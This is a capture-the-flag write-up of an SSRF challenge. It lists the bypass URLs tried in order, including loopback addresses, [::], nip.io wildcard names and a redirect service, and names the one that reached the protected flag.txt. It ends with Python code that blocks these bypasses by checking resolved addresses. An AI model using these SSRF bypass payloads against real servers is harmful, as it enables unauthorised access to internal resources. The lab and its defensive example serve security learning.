Do Not Serve

This was a simple SSRF level.
A link is given that shows a 403 Forbidden page. As the description on the page says, it can be accessed internally.
A form is given to load any URL.
Entered the link to flag.txt as it is: http://51.15.92.102:8080/flag.txt

Tried local IP: http://127.0.0.1:8080/flag.txt

Tried the local IP's sister: http://[::]:8080/flag.txt

Tried the local IP's mother: http://127.0.0.1.nip.io:8080/flag.txt

Tried the redirection: https://b99.in/ssrf.php?to=http%3A%2F%2F51.15.92.102%3A8080%2Fflag.txt

And the server did not like b99 either.
Tried an SSRF bypass trick: http://51.15.92.102.nip.io:8080/flag.txt

It worked! Gave a link that had the code.

Entered the code in the form and got the flag.
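
The write-up does not show the server's filter. As an added example (not the challenge's code and not from the original post), here is a fetch-side check that rejects every URL tried above, including the final one, by validating the resolved addresses instead of the hostname string. `fake_resolver`, `is_allowed` and the denylist policy are assumptions, and the resolver is a constructed stand-in for DNS that mimics nip.io so the code runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Addresses the fetcher must never reach. The public IP is the challenge
# server's own address from the write-up; the policy itself is assumed.
DENIED_NETS = [ipaddress.ip_network("51.15.92.102/32")]


def fake_resolver(host):
    """Constructed stand-in for DNS so the example runs offline.

    Mimics wildcard services such as nip.io: <ip>.nip.io resolves to <ip>.
    """
    if host.endswith(".nip.io"):
        return [host[: -len(".nip.io")]]
    return []  # unknown name: no answer


def resolve(host, resolver):
    """Return ip_address objects for an IP literal or a DNS name."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        pass  # not a literal, fall through to the resolver
    return [ipaddress.ip_address(a) for a in resolver(host)]


def is_allowed(url, resolver=fake_resolver):
    """Decide on the addresses the URL resolves to, never on its text."""
    try:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return False
        addrs = resolve(parts.hostname, resolver)
    except ValueError:
        return False  # malformed URL or unusable DNS answer
    if not addrs:
        return False  # fail closed when nothing resolves
    for ip in addrs:
        if (ip.is_loopback or ip.is_unspecified or ip.is_private
                or ip.is_link_local
                or any(ip in net for net in DENIED_NETS)):
            return False
    return True
```

The redirect attempt needs the same check applied to every hop, and the fetcher should connect to the exact address that was validated so a second DNS lookup cannot return something different.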